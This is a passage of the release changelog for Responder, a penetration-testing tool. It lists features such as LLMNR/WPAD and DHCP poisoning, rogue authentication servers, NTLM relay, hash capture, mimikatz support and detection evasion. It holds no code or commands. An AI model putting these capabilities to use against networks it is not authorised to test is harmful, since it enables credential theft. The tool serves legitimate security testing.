- Fixed options formating in README ([f85ad77](https://github.com/lgandx/Responder/commit/f85ad77d595f5d79b86ddce843bc884f1ff4ac9e) by Andrii Nechytailov).
## [v3.1.1.0](https://github.com/lgandx/Responder/releases/tag/v3.1.1.0) - 2021-12-17
<small>[Compare with v3.0.9.0](https://github.com/lgandx/Responder/compare/v3.0.9.0...v3.1.1.0)</small>
### Added
- Added IPv6 support ([5d4510c](https://github.com/lgandx/Responder/commit/5d4510cc1d0479b13ece9d58ea60d187daf8cdab) by lgandx).
- added: dhcp inform ([3e8c9fd](https://github.com/lgandx/Responder/commit/3e8c9fdb0eceb3eb1f7c6dbc81502b340a5ca152) by lgandx).
- Added DHCP DNS vs DHCP WPAD ([76f6c88](https://github.com/lgandx/Responder/commit/76f6c88df31bbd59dc6dceba1b59251012e45f81) by lgandx).
- Added DHCP DNS vs WPAD srv injection ([9dc7798](https://github.com/lgandx/Responder/commit/9dc779869b5a47fdf26cf79a727ea4a853f0d129) by lgandx).
- Added date and time for each Responder session config log. ([bb17595](https://github.com/lgandx/Responder/commit/bb17595e3fc9fafa58c8979bebc395ed872ef598) by lgandx).
### Removed
- removed fingerprint.py ([0b56d6a](https://github.com/lgandx/Responder/commit/0b56d6aaeb00406b364cf152b258365393d64ccc) by lgandx).
## [v3.0.9.0](https://github.com/lgandx/Responder/releases/tag/v3.0.9.0) - 2021-12-10
<small>[Compare with v3.0.8.0](https://github.com/lgandx/Responder/compare/v3.0.8.0...v3.0.9.0)</small>
### Added
- added the ability to provide external IP on WPAD poison via DHCP ([ba885b9](https://github.com/lgandx/Responder/commit/ba885b9345024809555d1a2c1f8cc463870602bb) by lgandx).
- Added a check for MSSQL ([5680487](https://github.com/lgandx/Responder/commit/568048710f0cf5c04c53fd8e026fdd1b3f5c16e6) by lgandx).
### Fixed
- Fixed the ON/OFF for poisoners when in Analyze mode. ([3cd5140](https://github.com/lgandx/Responder/commit/3cd5140c800d8f4e9e8547e4137cafe33fc2f066) by lgandx).
### Removed
- Remove analyze mode on DNS since you need to ARP to get queries ([17e62bd](https://github.com/lgandx/Responder/commit/17e62bda1aed4884c1f08e514faba8c1e39b36ad) by lgandx).
## [v3.0.8.0](https://github.com/lgandx/Responder/releases/tag/v3.0.8.0) - 2021-12-03
<small>[Compare with v3.0.7.0](https://github.com/lgandx/Responder/compare/v3.0.7.0...v3.0.8.0)</small>
### Added
- Added DB for RunFinger results & Report ([f90b76f](https://github.com/lgandx/Responder/commit/f90b76fed202ee4a6e17a030151c8de4430717a8) by lgandx).
- added timeout option for fine tuning ([a462d1d](https://github.com/lgandx/Responder/commit/a462d1df061b214eebcabdbe3f95caa5dd8ea3c7) by lgandx).
- added DHCP db & updated the report script to reflect that ([1dfa997](https://github.com/lgandx/Responder/commit/1dfa997da8c0fa1e51a1be30b2a3d5f5d92f4b7f) by lgandx).
- Added support for single IP or range file. ([02fb3f8](https://github.com/lgandx/Responder/commit/02fb3f8978286a486d633a707889ea8992a7f43a) by lgandx).
### Fixed
- fix: DHCP now working on VPN interface ([88a2c6a](https://github.com/lgandx/Responder/commit/88a2c6a53b721da995fbbd8e5cd82fb40d4af268) by lgandx).
- Fixed a bug and increased speed. ([1b2a22f](https://github.com/lgandx/Responder/commit/1b2a22facfd54820cc5f8ebba06f5cd996e917dc) by lgandx).
### Removed
- Removed old DHCP script since its now a Responder module. ([d425783](https://github.com/lgandx/Responder/commit/d425783be994b0d2518633e4b93e13e305685e5b) by lgandx).
- removed default certs ([de778f6](https://github.com/lgandx/Responder/commit/de778f66982817f1149408bc2e080371d3d4a71d) by lgandx).
- Removed the static certs and added automatic cert generation ([21afd35](https://github.com/lgandx/Responder/commit/21afd357f828b586cfa96992c8c978024285b162) by lgandx).
- removed debug str ([826b5af](https://github.com/lgandx/Responder/commit/826b5af9e2e37d50afdd3eb3ee66121e6c81c2a2) by lgandx).
## [v3.0.7.0](https://github.com/lgandx/Responder/releases/tag/v3.0.7.0) - 2021-10-26
<small>[Compare with v3.0.6.0](https://github.com/lgandx/Responder/compare/v3.0.6.0...v3.0.7.0)</small>
### Added
- Added DHCP server ([c449b6b](https://github.com/lgandx/Responder/commit/c449b6bcb990959e352967b3842b09978b9b2729) by lgandx).
- Add --lm switch for ESS downgrade ([dcb80d9](https://github.com/lgandx/Responder/commit/dcb80d992e385a0f0fdd3f724a0b040a42439306) by Pixis).
- Add ESS disabling information ([51f8ab4](https://github.com/lgandx/Responder/commit/51f8ab43682973df32534ca97c99fb1318a0c77d) by Pixis).
- Add ESS downgrade parameter ([baf80aa](https://github.com/lgandx/Responder/commit/baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516) by pixis).
### Fixed
- fixed minor isse ([350058c](https://github.com/lgandx/Responder/commit/350058c1795e43c23950b6bd23c33f45795ec7cc) by lgandx).
## [v3.0.6.0](https://github.com/lgandx/Responder/releases/tag/v3.0.6.0) - 2021-04-19
<small>[Compare with v3.0.5.0](https://github.com/lgandx/Responder/compare/v3.0.5.0...v3.0.6.0)</small>
### Added
- Added WinRM rogue server ([8531544](https://github.com/lgandx/Responder/commit/85315442bd010dd61fcb62de8d6ca9cc969426ba) by lgandx).
## [v3.0.5.0](https://github.com/lgandx/Responder/releases/tag/v3.0.5.0) - 2021-04-17
<small>[Compare with v3.0.4.0](https://github.com/lgandx/Responder/compare/v3.0.4.0...v3.0.5.0)</small>
### Added
- Added dce-rpc module + enhancements + bug fix. ([e91e37c](https://github.com/lgandx/Responder/commit/e91e37c9749f58330e0d68ce062a48b100a2d09e) by lgandx).
### Removed
- removed addiontional RR on SRV answers ([027e6b9](https://github.com/lgandx/Responder/commit/027e6b95c3ca89367cb5123758c2fc29aba27a59) by lgandx).
## [v3.0.4.0](https://github.com/lgandx/Responder/releases/tag/v3.0.4.0) - 2021-04-12
<small>[Compare with v3.0.3.0](https://github.com/lgandx/Responder/compare/v3.0.3.0...v3.0.4.0)</small>
### Added
- Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping ([1271b8e](https://github.com/lgandx/Responder/commit/1271b8e17983bd3969d951ce2b4c9b75600f94b9) by lgandx).
- added a check for exec file ([cc3a5b5](https://github.com/lgandx/Responder/commit/cc3a5b5cfffbb8e7430030aa66a2981feae7fe85) by lgandx).
- Added donation banner. ([8104139](https://github.com/lgandx/Responder/commit/8104139a3535a49caf7ec0ed64e8e33ea686494f) by lgandx).
- added donation address and minor typo ([06f9f91](https://github.com/lgandx/Responder/commit/06f9f91f118b0729a74d3c1810a493886655e6f1) by lgandx).
- added smb filetime support ([b0f044f](https://github.com/lgandx/Responder/commit/b0f044fe4e710597ae73e6f1af87ea246b0cd365) by lgandx).
### Removed
- removed FindSMB2UPTime.py since RunFinger already get this info ([6c51080](https://github.com/lgandx/Responder/commit/6c51080109fd8c9305021336c0dc8c72e01b5541) by lgandx).
- Removed MultiRelay binaries ([35b12b4](https://github.com/lgandx/Responder/commit/35b12b48323b1960960aba916334635d5a590875) by lgandx).
- Removed BindShell executable file ([5d762c4](https://github.com/lgandx/Responder/commit/5d762c4a550f2c578f4d7874f24563240276852d) by lgandx).
- Removed donation banner ([ccee87a](https://github.com/lgandx/Responder/commit/ccee87aa95f2ec16827592ba9d98c4895cec0cb9) by lgandx).
- removed verification ([dd1a674](https://github.com/lgandx/Responder/commit/dd1a67408081c94490a3263c46b2eb0b6107e542) by lgandx).
## [v3.0.3.0](https://github.com/lgandx/Responder/releases/tag/v3.0.3.0) - 2021-02-08
<small>[Compare with v3.0.2.0](https://github.com/lgandx/Responder/compare/v3.0.2.0...v3.0.3.0)</small>
### Added
- Added support for SMB2 signing ([24e7b7c](https://github.com/lgandx/Responder/commit/24e7b7c667c3c9feb1cd3a25b16bd8d9c2df5ec6) by lgandx).
- Added SMB2 support for RunFinger and various other checks. ([e24792d](https://github.com/lgandx/Responder/commit/e24792d7743dbf3a5c5ffac92113e36e5d682e42) by lgandx).
### Fixed
- Fix wrong syntax ([fb10d20](https://github.com/lgandx/Responder/commit/fb10d20ea387448ad084a57f5f4441c908fc53cc) by Khiem Doan).
- fix custom challenge in python3 ([7b47c8f](https://github.com/lgandx/Responder/commit/7b47c8fe4edcb53b035465985d92500b96fb1a84) by ThePirateWhoSmellsOfSunflowers).
- Fix typos in README ([12b796a](https://github.com/lgandx/Responder/commit/12b796a292b87be15ef8eec31cb276c447b9e8c8) by Laban Sköllermark).
## [v3.0.2.0](https://github.com/lgandx/Responder/releases/tag/v3.0.2.0) - 2020-09-28
<small>[Compare with v3.0.1.0](https://github.com/lgandx/Responder/compare/v3.0.1.0...v3.0.2.0)</small>
### Fixed
- Fixed LLMNR/NBT-NS/Browser issue when binding to a specific interface ([af7d27a](https://github.com/lgandx/Responder/commit/af7d27ac8cb3c2b0664a8b0a11940c0f3c25c891) by lgandx).
## [v3.0.1.0](https://github.com/lgandx/Responder/releases/tag/v3.0.1.0) - 2020-08-19
<small>[Compare with v3.0.0.0](https://github.com/lgandx/Responder/compare/v3.0.0.0...v3.0.1.0)</small>
### Added
- Added DNSUpdate.py, a small script to add DNS record to DC for gatering from different VLANs ([05617de](https://github.com/lgandx/Responder/commit/05617defefcd6954915d0b42d73d4ccfcccad2d4) by Sagar-Jangam).
### Fixed
- Fix encoding issue in Python 3 ([7420f62](https://github.com/lgandx/Responder/commit/7420f620825d5a5ae6dc68364a5680910f7f0512) by Sophie Brun).
## [v3.0.0.0](https://github.com/lgandx/Responder/releases/tag/v3.0.0.0) - 2020-01-09
<small>[Compare with v2.3.4.0](https://github.com/lgandx/Responder/compare/v2.3.4.0...v3.0.0.0)</small>
### Added
- Added py3 and py2 compatibility + many bugfix ([b510b2b](https://github.com/lgandx/Responder/commit/b510b2bb2523a3fe24953ac685e697914a60b26c) by lgandx).
## [v2.3.4.0](https://github.com/lgandx/Responder/releases/tag/v2.3.4.0) - 2019-08-17
<small>[Compare with v2.3.3.9](https://github.com/lgandx/Responder/compare/v2.3.3.9...v2.3.4.0)</small>
### Added
- Added RDP rogue server ([c52843a](https://github.com/lgandx/Responder/commit/c52843a5359a143c5a94a74c095d6ac4679cd4b1) by lgandx).
- Added proper changes to RunFinger (and is not checking for MS17-010 straight away) ([105502e](https://github.com/lgandx/Responder/commit/105502edd401615604e09a9a71a268252c82523d) by Paul A).
### Fixed
- Fix socket timeout on HTTP POST requests ([e7a787c](https://github.com/lgandx/Responder/commit/e7a787cbc4e01e92be6e062e94211dca644fae0c) by Crypt0-M3lon).
- fixed minor bugfix on recent merge ([38e721d](https://github.com/lgandx/Responder/commit/38e721da9826b95ed3599151559e8f8c535e4d6e) by lgandx).
- Fix multi HTTP responses ([defabfa](https://github.com/lgandx/Responder/commit/defabfa543f0b567d7e981003c7a00d7f02c3a16) by Clément Notin).
- Fix version number in settings.py ([621c5a3](https://github.com/lgandx/Responder/commit/621c5a3c125646c14db19fc48f30e4075102c929) by Clément Notin).
- Fixed some small typos in MS17-010 output ([daaf6f7](https://github.com/lgandx/Responder/commit/daaf6f7296ee754fe37b2382d0e459f7b6e74dcc) by Chris Maddalena).
### Removed
- removed debug string ([47e63ae](https://github.com/lgandx/Responder/commit/47e63ae4ec3266a35845d0bf116cf17fa0d17fd7) by lgandx).
## [v2.3.3.9](https://github.com/lgandx/Responder/releases/tag/v2.3.3.9) - 2017-11-20
<small>[Compare with v2.3.3.8](https://github.com/lgandx/Responder/compare/v2.3.3.8...v2.3.3.9)</small>
### Added
- Added: check for null sessions and MS17-010 ([b37f562](https://github.com/lgandx/Responder/commit/b37f56264a6b57faff81c12a8143662bf1ddb91d) by lgandx).
- Add ignore case on check body for html inject ([47c3115](https://github.com/lgandx/Responder/commit/47c311553eb38327622d5e6b25e20a662c31c30d) by Lionel PRAT).
- added support for plain auth ([207b0d4](https://github.com/lgandx/Responder/commit/207b0d455c95a5cd68fbfbbc022e5cc3cb41878f) by lgandx).
## [v2.3.3.8](https://github.com/lgandx/Responder/releases/tag/v2.3.3.8) - 2017-09-05
<small>[Compare with v2.3.3.7](https://github.com/lgandx/Responder/compare/v2.3.3.7...v2.3.3.8)</small>
### Changed
- Changed the complete LDAP parsing hash algo (ntlmv2 bug). ([679cf65](https://github.com/lgandx/Responder/commit/679cf65cff0c537b594d284cd01e2ea9c690d4ae) by lgandx).
## [v2.3.3.7](https://github.com/lgandx/Responder/releases/tag/v2.3.3.7) - 2017-09-05
<small>[Compare with v2.3.3.6](https://github.com/lgandx/Responder/compare/v2.3.3.6...v2.3.3.7)</small>
### Added
- Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 ([5859c31](https://github.com/lgandx/Responder/commit/5859c31e8ecf35c5b12ac653e8ab793bc9270604) by Matt Kelly).
- Add Microsoft SQL Server Browser responder ([bff935e](https://github.com/lgandx/Responder/commit/bff935e71ea401a4477004022623b1617ac090b3) by Matthew Daley).
- added: mimi32 cmd, MultiRelay random RPC & Namedpipe & latest mimikatz ([38219e2](https://github.com/lgandx/Responder/commit/38219e249e700c1b20317e0b96f4a120fdfafb98) by lgandx).
### Fixed
- Fixed various bugs and improved the LDAP module. ([be26b50](https://github.com/lgandx/Responder/commit/be26b504b5133c78158d9794cd361ce1a7418775) by lgandx).
- Fixed space typo in FindSMB2UPTime.py ([11c0096](https://github.com/lgandx/Responder/commit/11c00969c36b2ed51763ee6c975870b05e84cdcb) by myst404).
- Fixed instances of "CRTL-C" to "CTRL-C" ([44a4e49](https://github.com/lgandx/Responder/commit/44a4e495ccb21098c6b882feb25e636510fc72b9) by Randy Ramos).
## [v2.3.3.6](https://github.com/lgandx/Responder/releases/tag/v2.3.3.6) - 2017-03-29
<small>[Compare with v2.3.3.5](https://github.com/lgandx/Responder/compare/v2.3.3.5...v2.3.3.6)</small>
### Fixed
- Fixed bug in FindSMB2UPTime ([6f3cc45](https://github.com/lgandx/Responder/commit/6f3cc4564c9cf34b75ef5469fd54edd4b3004b54) by lgandx).
### Removed
- Removed Paypal donation link. ([b05bdca](https://github.com/lgandx/Responder/commit/b05bdcab9600ad4e7ef8b70e2d8ee1b03b8b442a) by lgandx).
## [v2.3.3.5](https://github.com/lgandx/Responder/releases/tag/v2.3.3.5) - 2017-02-18
<small>[Compare with v2.3.3.4](https://github.com/lgandx/Responder/compare/v2.3.3.4...v2.3.3.5)</small>
## [v2.3.3.4](https://github.com/lgandx/Responder/releases/tag/v2.3.3.4) - 2017-02-18
<small>[Compare with v2.3.3.3](https://github.com/lgandx/Responder/compare/v2.3.3.3...v2.3.3.4)</small>
### Added
- Added: Hashdump, Stats report ([21d48be](https://github.com/lgandx/Responder/commit/21d48be98fd30a9fd0747588cbbb070ed0ce100b) by lgandx).
- added `ip` commands in addition to ifconfig and netstat ([db61f24](https://github.com/lgandx/Responder/commit/db61f243c9cc3c9821703c78e780e745703c0bb3) by thejosko).
### Fixed
- fixed crash: typo. ([0642999](https://github.com/lgandx/Responder/commit/0642999741b02de79266c730cc262bb3345644f9) by lgandx).
- Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string ([de6e869](https://github.com/lgandx/Responder/commit/de6e869a7981d49725e791303bd16c4159d70880) by Gifts).
- Fix Proxy_Auth. Random challenge broke it. ([5a2ee18](https://github.com/lgandx/Responder/commit/5a2ee18bfaa66ff245747cf8afc114a9a894507c) by Timon Hackenjos).
## [v2.3.3.3](https://github.com/lgandx/Responder/releases/tag/v2.3.3.3) - 2017-01-03
<small>[Compare with v2.3.3.2](https://github.com/lgandx/Responder/compare/v2.3.3.2...v2.3.3.3)</small>
### Added
- Added: Random challenge for each requests (default) ([0d441d1](https://github.com/lgandx/Responder/commit/0d441d1899053fde6792288fc83be0c883df19f0) by lgandx).
## [v2.3.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.3.2) - 2017-01-03
<small>[Compare with v2.3.3.1](https://github.com/lgandx/Responder/compare/v2.3.3.1...v2.3.3.2)</small>
### Added
- Added: Random challenge for each requests (default) ([1d38cd3](https://github.com/lgandx/Responder/commit/1d38cd39af9154f5a9e898428de25fe0afa68d2f) by lgandx).
- Added paypal button ([17dc81c](https://github.com/lgandx/Responder/commit/17dc81cb6833a91300d0669398974f0ed9bc006e) by lgandx).
- Added: Scripting support. -c and -d command line switch ([ab2d890](https://github.com/lgandx/Responder/commit/ab2d8907f033384e593a38073e50604a834f4bf3) by lgandx).
- Added: BTC donation address ([730808c](https://github.com/lgandx/Responder/commit/730808c83c0c7f67370ceeff977b0e727eb28ea4) by lgandx).
### Removed
- Removed ThreadingMixIn. MultiRelay should process one request at the timeand queue the next ones. ([4a7499d](https://github.com/lgandx/Responder/commit/4a7499df039269094c718eb9e19760e79eea86f7) by lgandx).
## [v2.3.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.3.1) - 2016-10-18
<small>[Compare with v2.3.3.0](https://github.com/lgandx/Responder/compare/v2.3.3.0...v2.3.3.1)</small>
### Added
- Added: Logs dumped files for multiple targets ([d560105](https://github.com/lgandx/Responder/commit/d5601056b386a7ae3ca167f0562cbe87bf004c38) by lgandx).
### Fixed
- Fixed wrong challenge issue ([027f841](https://github.com/lgandx/Responder/commit/027f841cdf11fd0ad129825dcc70d6ac8b5d3983) by lgandx).
## [v2.3.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.3.0) - 2016-10-12
<small>[Compare with v2.3.2.8](https://github.com/lgandx/Responder/compare/v2.3.2.8...v2.3.3.0)</small>
### Added
- Added: Compability for Multi-Relay ([5b06173](https://github.com/lgandx/Responder/commit/5b0617361ede8df67caad4ca89723ad18a67fa53) by lgandx).
### Fixed
- Fix values for win98 and win10 (requested here: https://github.com/lgandx/Responder/pull/7/commits/d9d34f04cddbd666865089d809eb5b3d46dd9cd4) ([60c91c6](https://github.com/lgandx/Responder/commit/60c91c662607c3991cb760c7dd221e81cfb69518) by lgandx).
- Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6) ([ce211f7](https://github.com/lgandx/Responder/commit/ce211f7fcfa7ea9e3431161fec5075ca63730070) by lgandx).
- fixed bug in hash parsing. ([0cf1087](https://github.com/lgandx/Responder/commit/0cf1087010088ef1c3fecc7d2ad851c7c49d0639) by lgandx).
### Changed
- Changed to executable ([3e46ecd](https://github.com/lgandx/Responder/commit/3e46ecd27e53c58c3dc38888a2db1d3340a5a3ab) by lgandx).
## [v2.3.2.8](https://github.com/lgandx/Responder/releases/tag/v2.3.2.8) - 2016-10-06
<small>[Compare with v2.3.2.7](https://github.com/lgandx/Responder/compare/v2.3.2.7...v2.3.2.8)</small>
### Added
- Added: Now delete services on the fly. ([c6e401c](https://github.com/lgandx/Responder/commit/c6e401c2290fbb6c68bbc396915ea3fa7b11b5f0) by lgandx).
## [v2.3.2.7](https://github.com/lgandx/Responder/releases/tag/v2.3.2.7) - 2016-10-05
<small>[Compare with v2.3.2.6](https://github.com/lgandx/Responder/compare/v2.3.2.6...v2.3.2.7)</small>
### Added
- Added: Possibility to target all users. use 'ALL' with -u ([d81ef9c](https://github.com/lgandx/Responder/commit/d81ef9c33ab710f973c68f60cd0b7960f9e4841b) by lgandx).
### Fixed
- Fixed minor bug ([7054c60](https://github.com/lgandx/Responder/commit/7054c60f38cafc7e1c4d8a6ce39e12afbfc8b482) by lgandx).
## [v2.3.2.6](https://github.com/lgandx/Responder/releases/tag/v2.3.2.6) - 2016-10-05
<small>[Compare with v2.3.2.5](https://github.com/lgandx/Responder/compare/v2.3.2.5...v2.3.2.6)</small>
## [v2.3.2.5](https://github.com/lgandx/Responder/releases/tag/v2.3.2.5) - 2016-10-03
<small>[Compare with v2.3.2.4](https://github.com/lgandx/Responder/compare/v2.3.2.4...v2.3.2.5)</small>
### Added
- Added logs folder. ([cd09e19](https://github.com/lgandx/Responder/commit/cd09e19a9363867a75d7db1dea4830969bc0d68e) by lgandx).
- Added: Cross-protocol NTLMv1-2 relay (beta). ([ab67070](https://github.com/lgandx/Responder/commit/ab67070a2b82e94f2abb506a69f8fa8c0dc09852) by lgandx).
### Removed
- Removed logs folder. ([5d83778](https://github.com/lgandx/Responder/commit/5d83778ac7caba920874dc49f7523c6ef80b6d7b) by lgandx).
## [v2.3.2.4](https://github.com/lgandx/Responder/releases/tag/v2.3.2.4) - 2016-09-12
<small>[Compare with v2.3.2.3](https://github.com/lgandx/Responder/compare/v2.3.2.3...v2.3.2.4)</small>
## [v2.3.2.3](https://github.com/lgandx/Responder/releases/tag/v2.3.2.3) - 2016-09-12
<small>[Compare with v2.3.2.2](https://github.com/lgandx/Responder/compare/v2.3.2.2...v2.3.2.3)</small>
### Added
- Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On. ([35d933d](https://github.com/lgandx/Responder/commit/35d933d5964df607ec714ced93e4cb197ff2bfe7) by lgandx).
## [v2.3.2.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2.2) - 2016-09-12
<small>[Compare with v2.3.2.1](https://github.com/lgandx/Responder/compare/v2.3.2.1...v2.3.2.2)</small>
### Added
- Added support for webdav, auto credz. ([ad9ce6e](https://github.com/lgandx/Responder/commit/ad9ce6e659ffd9dd31714260f906c8de02223398) by lgandx).
- Added option -e, specify an external IP address to redirect poisoned traffic to. ([04c270f](https://github.com/lgandx/Responder/commit/04c270f6b75cd8eb833cca3b71965450d925e6ac) by lgandx).
### Removed
- removed debug info ([3e2e375](https://github.com/lgandx/Responder/commit/3e2e375987ce2ae03e6a88ffadabb13823ba859c) by lgandx).
## [v2.3.2.1](https://github.com/lgandx/Responder/releases/tag/v2.3.2.1) - 2016-09-11
<small>[Compare with v2.3.2](https://github.com/lgandx/Responder/compare/v2.3.2...v2.3.2.1)</small>
## [v2.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2) - 2016-09-11
<small>[Compare with v2.3.1](https://github.com/lgandx/Responder/compare/v2.3.1...v2.3.2)</small>
### Added
- Added proxy auth server + various fixes and improvements ([82fe64d](https://github.com/lgandx/Responder/commit/82fe64dfd988321cbc1a8cb3d8f01caa38f4193e) by lgandx).
- Added current date for all HTTP headers, avoiding easy detection ([ecd62c3](https://github.com/lgandx/Responder/commit/ecd62c322f48eadb235312ebb1e57375600ef0f1) by lgandx).
### Removed
- Removed useless HTTP headers ([881dae5](https://github.com/lgandx/Responder/commit/881dae59cf3c95047d82b34208f57f94b3e85b04) by lgandx).
## [v2.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.1) - 2016-09-09
<small>[Compare with v2.3.0](https://github.com/lgandx/Responder/compare/v2.3.0...v2.3.1)</small>
### Added
- Added SMBv2 support enabled by default. ([85d7974](https://github.com/lgandx/Responder/commit/85d7974513a9b6378ed4c0c07a7dd640c27ead9b) by lgandx).
- added new option, for Config-Responder.log file. ([a9c2b29](https://github.com/lgandx/Responder/commit/a9c2b297c6027030e3f83c7626fff6f66d5a4f1b) by lgaffie).
- Add compatability with newer net-tools ifconfig. ([e19e349](https://github.com/lgandx/Responder/commit/e19e34997e68a2f567d04d0c013b7870530b7bfd) by Hank Leininger).
- Add HTTP Referer logging ([16e6464](https://github.com/lgandx/Responder/commit/16e6464748d3497943a9d96848ead9058dc0f7e9) by Hubert Seiwert).
- Added recent Windows versions. ([6eca29d](https://github.com/lgandx/Responder/commit/6eca29d08cdd0d259760667da0c41e76d2cd2693) by Jim Shaver).
- Added: Support for OSx ([59e48e8](https://github.com/lgandx/Responder/commit/59e48e80dd6153f83899413c2fc71a46367d4abf) by lgandx).
### Fixed
- Fixed colors in log files ([d9258e2](https://github.com/lgandx/Responder/commit/d9258e2dd80ab1d62767377250c76bf5c9f2a50d) by lgaffie).
- Fixed the regexes for Authorization: headers. ([a81a9a3](https://github.com/lgandx/Responder/commit/a81a9a31e4dbef2890fbf51830b6a9374d6a8f8a) by Hank Leininger).
- Fix Windows 10 support. ([a84b351](https://github.com/lgandx/Responder/commit/a84b3513e1fdd47025ceaa743ce0f506f162640b) by ValdikSS).
- Fixed color bug in Analyze mode ([04c841d](https://github.com/lgandx/Responder/commit/04c841d34e0d32970f08ae91ad0f931b1b90d6ab) by lgandx).
- fixed minor bug ([6f8652c](https://github.com/lgandx/Responder/commit/6f8652c0fccfe83078254d7b38cb9fd517a6bf42) by lgandx).
- Fixed Icmp-Redirect.. ([df63c1f](https://github.com/lgandx/Responder/commit/df63c1fc138d1682a86bc2114a5352ae897865c6) by lgandx).
- Fixed some tools and +x on some executables ([8171a96](https://github.com/lgandx/Responder/commit/8171a96b9eaac3cd25ef18e8ec8b303c5877f4d0) by lgandx).
- Fix generation of HTTP response in HTTP proxy ([b2830e0](https://github.com/lgandx/Responder/commit/b2830e0a4f46f62db4d34b3e8f93ea505be32000) by Antonio Herraiz).
- Fix misspelling of poisoners ([6edc01d](https://github.com/lgandx/Responder/commit/6edc01d8511189489e4b5fd9873f25712920565c) by IMcPwn).
### Changed
- change IsOSX to utils.IsOsX. Fixes #89 ([08c3a90](https://github.com/lgandx/Responder/commit/08c3a90b400d0aff307dd43ff4cd6f01ca71a6cb) by Jared Haight).
- Changed email address ([f5a8bf0](https://github.com/lgandx/Responder/commit/f5a8bf0650bc088b6ef5ae7432f2baef0d52852c) by lgandx).
- Changed connection to SQlite db to support different encoded charsets ([0fec40c](https://github.com/lgandx/Responder/commit/0fec40c3b4c621ee21a88906e77c6ea7a56cb8a9) by Yannick Méheut).
- Changed comment to be more clear about what is being done when logging ([08535e5](https://github.com/lgandx/Responder/commit/08535e55391d762be4259a1fada330ef3f0ac134) by Yannick Méheut).
### Removed
- Removed the config dump in Responder-Session.log. New file gets created in logs, with host network config such as dns, routes, ifconfig and config dump ([a765a8f](https://github.com/lgandx/Responder/commit/a765a8f0949de37940364d0a228aff72c0701aa0) by lgaffie).
## [v2.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.0) - 2015-09-11
<small>[Compare with v2.1.4](https://github.com/lgandx/Responder/compare/v2.1.4...v2.3.0)</small>
### Added
- Added support for Samba4 clients ([ee033e0](https://github.com/lgandx/Responder/commit/ee033e0c7f28a0584c8ebcb2c31fe949581f0022) by lgandx).
- Added support for upstream proxies for the rogue WPAD server ([f4bd612](https://github.com/lgandx/Responder/commit/f4bd612e083698fd94308fd2fd15ba7d8d289fd8) by jrmdev).
### Fixed
- Fixed Harsh Parser variable typo ([5ab431a](https://github.com/lgandx/Responder/commit/5ab431a4fe24a2ba4666b9c51ad59a0bb8a0053d) by lgandx).
- fixed var name ([62ed8f0](https://github.com/lgandx/Responder/commit/62ed8f00626a2ad0fbbfb845e808d77938f4513a) by byt3bl33d3r).
- Fixes MDNS Name parsing error ([3261288](https://github.com/lgandx/Responder/commit/3261288c82fee415dd8e1ba64b80596ef97da490) by byt3bl33d3r).
- Fixed FTP module. ([75664a4](https://github.com/lgandx/Responder/commit/75664a4f37feb897be52480223cd1633d322ede8) by jrmdev).
- Fixing a bug in HTTP proxy, was calling recv() too many times ([ddaa9f8](https://github.com/lgandx/Responder/commit/ddaa9f87674dc8ac3f9104196f2f92cdec130682) by lanjelot).
### Changed
- changed operand ([cb9c2c8](https://github.com/lgandx/Responder/commit/cb9c2c8b97761cc5e00051efd74c9c3fdaf5762d) by byt3bl33d3r).
## [v2.1.4](https://github.com/lgandx/Responder/releases/tag/v2.1.4) - 2014-12-06
<small>[Compare with v2.1.3](https://github.com/lgandx/Responder/compare/v2.1.3...v2.1.4)</small>
### Added
- Added: FindSMB2UPTime script. Find when is the last time a >= 2008 server was updated. ([7a95ef1](https://github.com/lgandx/Responder/commit/7a95ef1474d3cea88680f359581aa89a4e9c30f5) by lgandx).
## [v2.1.3](https://github.com/lgandx/Responder/releases/tag/v2.1.3) - 2014-11-27
<small>[Compare with v2.1.2](https://github.com/lgandx/Responder/compare/v2.1.2...v2.1.3)</small>
### Added
- Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion ([36ef78f](https://github.com/lgandx/Responder/commit/36ef78f85aea5db33f37a6d1d73bf3bb7f82336f) by lgandx).
- Added --version and kost's fix for /etc/resolv.conf empty lines parsing. ([c05bdfc](https://github.com/lgandx/Responder/commit/c05bdfce17234b216b408080d9aba5db443de507) by lgandx).
## [v2.1.2](https://github.com/lgandx/Responder/releases/tag/v2.1.2) - 2014-08-26
<small>[Compare with v2.1.0](https://github.com/lgandx/Responder/compare/v2.1.0...v2.1.2)</small>
### Added
- Added: Log command line in Responder-Session.log. ([f69e93c](https://github.com/lgandx/Responder/commit/f69e93c02e81a83309d3863f6d5680b36378a16b) by lgandx).
### Fixed
- Fixed serve-always and serve-exe with the new WPAD server. ([cf7b477](https://github.com/lgandx/Responder/commit/cf7b4771caf335a1a283fae08923c413acae3343) by lgandx).
## [v2.1.0](https://github.com/lgandx/Responder/releases/tag/v2.1.0) - 2014-08-16
<small>[Compare with v2.0.9](https://github.com/lgandx/Responder/compare/v2.0.9...v2.1.0)</small>
### Fixed
- fixed: identation. ([5c9fec9](https://github.com/lgandx/Responder/commit/5c9fec923c8cb77f00466db6192b1ecb8980bdcf) by lgandx).
## [v2.0.9](https://github.com/lgandx/Responder/releases/tag/v2.0.9) - 2014-05-28
<small>[Compare with v2.0.8](https://github.com/lgandx/Responder/compare/v2.0.8...v2.0.9)</small>
### Fixed
- Fixed high cpu usage in some specific cases ([4558861](https://github.com/lgandx/Responder/commit/4558861ce2dd56c0e4c5157437c8726a26e382c5) by lgandx).
### Removed
- Removed: old style options. Just use -r instead of -r On ([a21aaf7](https://github.com/lgandx/Responder/commit/a21aaf7987e26eee5455d68cd76ff56b5466b7f2) by lgandx).
## [v2.0.8](https://github.com/lgandx/Responder/releases/tag/v2.0.8) - 2014-04-22
<small>[Compare with v2.0.7](https://github.com/lgandx/Responder/compare/v2.0.7...v2.0.8)</small>
### Added
